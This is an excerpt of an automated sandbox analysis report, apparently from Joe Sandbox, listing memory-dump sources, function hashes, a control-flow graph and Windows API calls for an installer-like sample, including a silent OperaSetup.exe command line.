                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 4f111ab4920ac525fdea371edc0372209efebd88f4f49b64d61f26737748280a
                                                                                                                                              • Instruction ID: a75c210e76fb72c91da92bd055febaaadf45c37f1dc492509737fdaa257f63d6
                                                                                                                                              • Opcode Fuzzy Hash: 4f111ab4920ac525fdea371edc0372209efebd88f4f49b64d61f26737748280a
                                                                                                                                              • Instruction Fuzzy Hash: 2D817731D04228DBDF24CFA8C844BADBBB1FF44315F20856AD856BB281C7796A86DF45

                                                                                                                                              Control-flow Graph

                                                                                                                                              • Executed
                                                                                                                                              • Not Executed
                                                                                                                                              control_flow_graph 779 40705f-407063 780 407081-4070c4 779->780 781 407065-40707c 779->781 782 40742c-407441 780->782 781->782 783 407443-407459 782->783 784 40745b-407471 782->784 785 407474-40747b 783->785 784->785 786 4074a2-4074ae 785->786 787 40747d-407481 785->787 793 406c53 786->793 794 40765b 786->794 788 407630-40763a 787->788 789 407487-40749f 787->789 792 407646-407659 788->792 789->786 795 40765e-407662 792->795 796 406c5a-406c5e 793->796 797 406d9a-406dbb 793->797 798 406cff-406d03 793->798 799 406d6f-406d73 793->799 794->795 796->792 800 406c64-406c71 796->800 797->782 803 406d09-406d22 798->803 804 4075af-4075b9 798->804 801 406d79-406d8d 799->801 802 4075be-4075c8 799->802 800->794 806 406c77-406cbd 800->806 807 406d90-406d98 801->807 802->792 805 406d25-406d29 803->805 804->792 805->798 808 406d2b-406d31 805->808 809 406ce5-406ce7 806->809 810 406cbf-406cc3 806->810 807->797 807->799 811 406d33-406d3a 808->811 812 406d5b-406d6d 808->812 815 406cf5-406cfd 809->815 816 406ce9-406cf3 809->816 813 406cc5-406cc8 GlobalFree 810->813 814 406cce-406cdc GlobalAlloc 810->814 817 406d45-406d55 GlobalAlloc 811->817 818 406d3c-406d3f GlobalFree 811->818 812->807 813->814 814->794 819 406ce2 814->819 815->805 816->815 816->816 817->794 817->812 818->817 819->809
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: eb6308170f34cf48dfcb4d8f9c09bb4bb9b1200d68288f83770d90fe7aa59a96
                                                                                                                                              • Instruction ID: 2ce83fc52b21f36f835e1fdafd5cf74e6ced0850754c4da96a209bb8fab2d9ce
                                                                                                                                              • Opcode Fuzzy Hash: eb6308170f34cf48dfcb4d8f9c09bb4bb9b1200d68288f83770d90fe7aa59a96
                                                                                                                                              • Instruction Fuzzy Hash: 11712471D04228DBDF28CFA8C8847ADBBB1FF48305F15806AD856B7281C778A986DF55
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 35efb6cfb69a5e3ac5770c17f23e35896c35ba4500d931508133f68803cc17e7
                                                                                                                                              • Instruction ID: eaca5e257ecba6057ed761995cb39389c4d8ec983a179070fe5d03b82c062b57
                                                                                                                                              • Opcode Fuzzy Hash: 35efb6cfb69a5e3ac5770c17f23e35896c35ba4500d931508133f68803cc17e7
                                                                                                                                              • Instruction Fuzzy Hash: BF713671E04218DBDF28CFA8C884BADBBB1FF44305F14806AD856BB281C7786986DF55
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID:
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID:
                                                                                                                                              • Opcode ID: 3a7222321010e346b35687484556753c48e929d86f13e87db132154ce9d598b8
                                                                                                                                              • Instruction ID: 26522df2f7fda751442351ae768cbf4c3b612a3e7fb567ef5040218afec9c9a0
                                                                                                                                              • Opcode Fuzzy Hash: 3a7222321010e346b35687484556753c48e929d86f13e87db132154ce9d598b8
                                                                                                                                              • Instruction Fuzzy Hash: CB713771D04228DBEF28CF98C8447ADBBB1FF44305F15806AD856B7281C778A946DF45
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 00402128
                                                                                                                                                • Part of subcall function 00405727: lstrlenW.KERNEL32(0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000,?), ref: 0040575F
                                                                                                                                                • Part of subcall function 00405727: lstrlenW.KERNEL32(004030CD,0043A728,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030CD,00000000), ref: 0040576F
                                                                                                                                                • Part of subcall function 00405727: lstrcatW.KERNEL32(0043A728,004030CD,004030CD,0043A728,00000000,00000000,00000000), ref: 00405782
                                                                                                                                                • Part of subcall function 00405727: SetWindowTextW.USER32(0043A728,0043A728), ref: 00405794
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004057BA
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004057D4
                                                                                                                                                • Part of subcall function 00405727: SendMessageW.USER32(?,00001013,?,00000000), ref: 004057E2
                                                                                                                                              • LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 00402139
                                                                                                                                              • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 004021B6
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 334405425-0
                                                                                                                                              • Opcode ID: bd5665d3c642ef3073feb2242ea4fac62aded45c66893f7ea3efa05918624785
                                                                                                                                              • Instruction ID: ce338c56279ea8fe8b79aec8352296299df23ba62fb37657eb23f857ac8d175a
                                                                                                                                              • Opcode Fuzzy Hash: bd5665d3c642ef3073feb2242ea4fac62aded45c66893f7ea3efa05918624785
                                                                                                                                              • Instruction Fuzzy Hash: 9721D431900104EADF10AFA5CF89A9E7A71BF54355F30413BF501B91E5CBBD89829A2E
                                                                                                                                              APIs
                                                                                                                                              • GlobalFree.KERNELBASE(050F3928), ref: 00401C30
                                                                                                                                              • GlobalAlloc.KERNEL32(00000040,00004004), ref: 00401C42
                                                                                                                                              Strings
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: Global$AllocFree
                                                                                                                                              • String ID: "C:\Users\user\Downloads\OperaSetup.exe" --silent --allusers=0
                                                                                                                                              • API String ID: 3394109436-1546330588
                                                                                                                                              • Opcode ID: 5a5a1ee5ed13d0feaabbf874524b486d37df7d8f4895048c82ffb873ba65e8fb
                                                                                                                                              • Instruction ID: 411326a6bd5adc799c7b4966fae4248b5e735fb78bdcb674ef76145c70810545
                                                                                                                                              • Opcode Fuzzy Hash: 5a5a1ee5ed13d0feaabbf874524b486d37df7d8f4895048c82ffb873ba65e8fb
                                                                                                                                              • Instruction Fuzzy Hash: 7D210572A04150ABEB20EFA5DD9599E73A8AF14314714483FFA52F36D0C67C9C908B1D
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040616D: GetFileAttributesW.KERNEL32(?,?,00405D72,?,?,00000000,00405F48,?,?,?,?), ref: 00406172
                                                                                                                                                • Part of subcall function 0040616D: SetFileAttributesW.KERNEL32(?,00000000), ref: 00406186
                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,?,?,00000000,00405F48), ref: 00405D81
                                                                                                                                              • DeleteFileW.KERNEL32(?,?,?,00000000,00405F48), ref: 00405D89
                                                                                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405DA1
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: File$Attributes$DeleteDirectoryRemove
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1655745494-0
                                                                                                                                              • Opcode ID: dd2cb9d4d09abd673c60ba1604a9489d115b5ba734863609cc63878b625e133a
                                                                                                                                              • Instruction ID: 230036c29a26c5c6c0f0d9698206584c8b05a9663c1b6bdb31d330f7893cafd1
                                                                                                                                              • Opcode Fuzzy Hash: dd2cb9d4d09abd673c60ba1604a9489d115b5ba734863609cc63878b625e133a
                                                                                                                                              • Instruction Fuzzy Hash: A6E065312156915AC35057759E0CA6B2A98DFC6724F15893BF892F11D0CB7C884A8A6D
                                                                                                                                              APIs
                                                                                                                                              • SetFilePointer.KERNEL32(00008001,00000000,00000000,00000000,00000000,?,?,00403342,000000FF,00000000,00000000,00008001,?), ref: 004033BB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: FilePointer
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                              • Opcode ID: 8ae365655b7597d869b3b2f56841766425f6863b3c44559cbc89e4a26d302e34
                                                                                                                                              • Instruction ID: 1ca1e87bffa477aecce4b8809d13608721b46e5c52e0656af2305a29f618206d
                                                                                                                                              • Opcode Fuzzy Hash: 8ae365655b7597d869b3b2f56841766425f6863b3c44559cbc89e4a26d302e34
                                                                                                                                              • Instruction Fuzzy Hash: E9317F30504219BBDB12DF55EE85A9E3FA8EB00359F10443BF905FA190D2788A509BA9
                                                                                                                                              APIs
                                                                                                                                                • Part of subcall function 0040601C: CharNextW.USER32(?,?,00456750,?,00406090,00456750,00456750,76F93420,?,76F92EE0,00405DCE,?,76F93420,76F92EE0,004BD000), ref: 0040602A
                                                                                                                                                • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 0040602F
                                                                                                                                                • Part of subcall function 0040601C: CharNextW.USER32(00000000), ref: 00406047
                                                                                                                                              • GetFileAttributesW.KERNEL32(?,?,00000000,0000005C,00000000,000000F0), ref: 0040163F
                                                                                                                                                • Part of subcall function 00405BF6: CreateDirectoryW.KERNEL32(00481000,?), ref: 00405C38
                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(?,004C5000,?,00000000,000000F0), ref: 00401672
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1892508949-0
                                                                                                                                              • Opcode ID: 95a4860431ad72eda60d3769fb9d39a986bc9f4f4600bed416f8c382693ae343
                                                                                                                                              • Instruction ID: 984bc8847ab7730807188d0ae4260eaffd58af59862b83f9ec54611d8a9cde38
                                                                                                                                              • Opcode Fuzzy Hash: 95a4860431ad72eda60d3769fb9d39a986bc9f4f4600bed416f8c382693ae343
                                                                                                                                              • Instruction Fuzzy Hash: 0B11C431504514EBDF20AFA5CD4169F36A0EF14368B29493FF942B22F1D63E8981DA5E
                                                                                                                                              APIs
                                                                                                                                              • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402580
                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,004125F8,00000000,00000011,00000002), ref: 00402622
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseQueryValue
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3356406503-0
                                                                                                                                              • Opcode ID: 1afaa0eb68ef52f167e8a4d151f2c3bf02fb3977f39619ee02b743959e6b5f4c
                                                                                                                                              • Instruction ID: 1ca5a891072309ee4d57d6c386aa99eedf8583e79045272cabd10b8210a2a1fd
                                                                                                                                              • Opcode Fuzzy Hash: 1afaa0eb68ef52f167e8a4d151f2c3bf02fb3977f39619ee02b743959e6b5f4c
                                                                                                                                              • Instruction Fuzzy Hash: 3311C171904206EADF15DFA0DA585AE7774FF04348F20443FE802B62D0D3B84A41DB5D
                                                                                                                                              APIs
                                                                                                                                              • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                              • SendMessageW.USER32(0040A230,00000402,00000000), ref: 004013F4
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: MessageSend
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                              • Opcode ID: 1d8cdfb8dfb056e96828346964ac3a90e07f6a4c165948e412157bc5f6f5cc6c
                                                                                                                                              • Instruction ID: 79785e1055596f35c81cc11ac1c08ebc052ec65b95c8641ce566291046e0593e
                                                                                                                                              • Opcode Fuzzy Hash: 1d8cdfb8dfb056e96828346964ac3a90e07f6a4c165948e412157bc5f6f5cc6c
                                                                                                                                              • Instruction Fuzzy Hash: C10144316202109BEB091B799D04B2B3398E750754F20427FF841F32F0E6B8CC028B4E
                                                                                                                                              APIs
                                                                                                                                              • CreateDirectoryW.KERNEL32(00481000,?), ref: 00405C38
                                                                                                                                              • GetLastError.KERNEL32 ref: 00405C46
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 1375471231-0
                                                                                                                                              • Opcode ID: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                                                                                                              • Instruction ID: 25e10c4fac4d698a59efea960107f93253b8ac9e3b964bd1d6400c706bcc644c
                                                                                                                                              • Opcode Fuzzy Hash: cc352e270a5c7d66bac2c8a7d463e84c1d5eb2dce2c10117675193e318c6cc25
                                                                                                                                              • Instruction Fuzzy Hash: E6F0F4B0C04209DAEB00CFA4D9497EFBBB4BB04319F00802AD541B6281D7B882488FA9
                                                                                                                                              APIs
                                                                                                                                              • CreateProcessW.KERNEL32(00000000,00481000,00000000,00000000,00000000,04000000,00000000,00000000,0045A750,?,?,?,00481000,?), ref: 00405CAE
                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,00481000,?), ref: 00405CBB
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093364765.0000000000408000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000040A000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000041E000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.000000000045B000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093395749.00000000004F1000.00000004.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              • Associated: 0000001B.00000002.2093539377.00000000004FD000.00000002.00000001.01000000.00000015.sdmpDownload File
                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                              • Snapshot File: hcaresult_27_2_400000_ya.jbxd
                                                                                                                                              Similarity
                                                                                                                                              • API ID: CloseCreateHandleProcess
                                                                                                                                              • String ID:
                                                                                                                                              • API String ID: 3712363035-0
                                                                                                                                              • Opcode ID: c45f180bea824e86b9f60da59515b64d79646989f9db2e08603b41b576f742c4
                                                                                                                                              • Instruction ID: 678fb2cce29b027916b6e9c77d741f72fc3b9667aac1924bad6fa13dfa27649e
                                                                                                                                              • Opcode Fuzzy Hash: c45f180bea824e86b9f60da59515b64d79646989f9db2e08603b41b576f742c4
                                                                                                                                              • Instruction Fuzzy Hash: E6E0BFB4500209BFFB009B64ED49F7B7B7CE704605F008525BD10F2191D774D8159A7D
                                                                                                                                              APIs
                                                                                                                                              • GetModuleHandleA.KERNEL32(?,00000020,?,00403775,0000000C,?,?,?,?,?,?,?,?), ref: 00406AA8
                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00406AC3
                                                                                                                                                • Part of subcall function 00406A26: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00406A3D
                                                                                                                                                • Part of subcall function 00406A26: wsprintfW.USER32 ref: 00406A78
                                                                                                                                                • Part of subcall function 00406A26: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 00406A8C
                                                                                                                                              Memory Dump Source
                                                                                                                                              • Source File: 0000001B.00000002.2093334446.0000000000401000.00000020.00000001.01000000.00000015.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                              • Associated: 0000001B.00000002.2093304327.0000000000400000.00000002.00000001.01000000.00000015.sdmpDownload File
